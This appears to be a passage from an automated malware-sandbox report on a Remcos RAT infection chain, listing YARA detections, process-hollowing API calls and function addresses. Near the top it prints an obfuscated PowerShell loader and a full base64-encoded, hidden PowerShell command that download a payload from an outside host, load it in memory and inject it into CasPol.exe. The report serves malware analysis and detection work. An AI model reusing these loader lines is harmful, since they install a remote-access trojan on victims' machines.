sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"Jump to behavior
                    Malicious sample detected (through community Yara rule)
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 8092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041ACC1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,12_2_0041ACED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10006FA0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,12_2_10006FA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00401806 NtdllDefWindowProc_W,18_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004018C0 NtdllDefWindowProc_W,18_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_048820BD3_2_048820BD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_047820BD10_2_047820BD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D07112_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520D212_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D09812_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043715012_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361AA12_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042625412_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043137712_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043651C12_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C73912_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004367C612_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267CB12_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A4912_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436A8D12_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436D4812_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D2212_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E7312_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E2012_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F0012_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FAD12_2_00426FAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0457B5C112_2_0457B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0458719412_2_04587194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100012CB12_2_100012CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1003224912_2_10032249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001F57B12_2_1001F57B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001B58412_2_1001B584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100137B012_2_100137B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B97012_2_1000B970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10009AB012_2_10009AB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10009D2012_2_10009D20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000ED8812_2_1000ED88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000EFB712_2_1000EFB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044B04018_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043610D18_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044731018_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044A49018_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040755A18_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043C56018_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044B61018_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044D6C018_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004476F018_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044B87018_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044081D18_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041495718_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004079EE18_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00407AEB18_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044AA8018_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00412AA918_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404B7418_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404B0318_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044BBD818_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404BE518_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404C7618_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00415CFE18_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00416D7218_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00446D3018_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00446D8B18_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406E8F18_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0040503819_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0041208C19_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004050A919_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0040511A19_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0043C13A19_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004051AB19_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044930019_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0040D32219_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044A4F019_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0043A5AB19_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0041363119_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044669019_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044A73019_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004398D819_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004498E019_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044A88619_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0043DA0919_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00438D5E19_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00449ED019_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0041FE8319_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00430F5419_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004050C224_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004014AB24_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040513324_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004051A424_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040124624_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040CA4624_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040523524_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004032C824_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_0040168924_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402F6024_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1000A5A6 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1000B100 appears 33 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2066
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2286
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2066Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2286Jump to behavior
